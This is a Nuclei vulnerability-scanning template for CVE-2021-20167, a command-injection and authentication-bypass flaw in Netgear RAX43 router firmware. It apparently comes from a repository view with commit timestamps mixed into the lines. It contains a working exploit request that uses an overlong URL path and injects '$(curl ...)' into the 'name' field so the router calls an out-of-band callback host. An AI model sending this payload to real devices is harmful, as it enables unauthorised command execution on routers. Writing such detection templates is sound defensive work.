nuclei-templates/http/cves/2021/CVE-2021-20167.yaml

46 lines
1.9 KiB
YAML
Raw Normal View History

id: CVE-2021-20167
info:
name: Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun
author: gy741
severity: high
description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.'
2023-09-06 12:09:01 +00:00
remediation: Upgrade to newer release of the RAX43 firmware.
reference:
- https://www.tenable.com/security/research/tra-2021-55
- https://nvd.nist.gov/vuln/detail/CVE-2021-20166
- https://nvd.nist.gov/vuln/detail/CVE-2021-20167
classification:
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8
cve-id: CVE-2021-20167
cwe-id: CWE-77
2023-08-31 11:46:18 +00:00
epss-score: 0.95111
epss-percentile: 0.99023
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: netgear
product: rax43_firmware
tags: tenable,cve,cve2021,netgear,rce,router
http:
- raw:
- |
POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1
Host: {{Hostname}}
2022-08-24 08:56:43 +00:00
"name":"';$(curl {{interactsh-url}});'",
"email":"a@b.c"
2023-10-08 07:54:05 +00:00
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
2023-10-08 07:54:05 +00:00
- type: word
part: interactsh_request
words:
- "User-Agent: curl"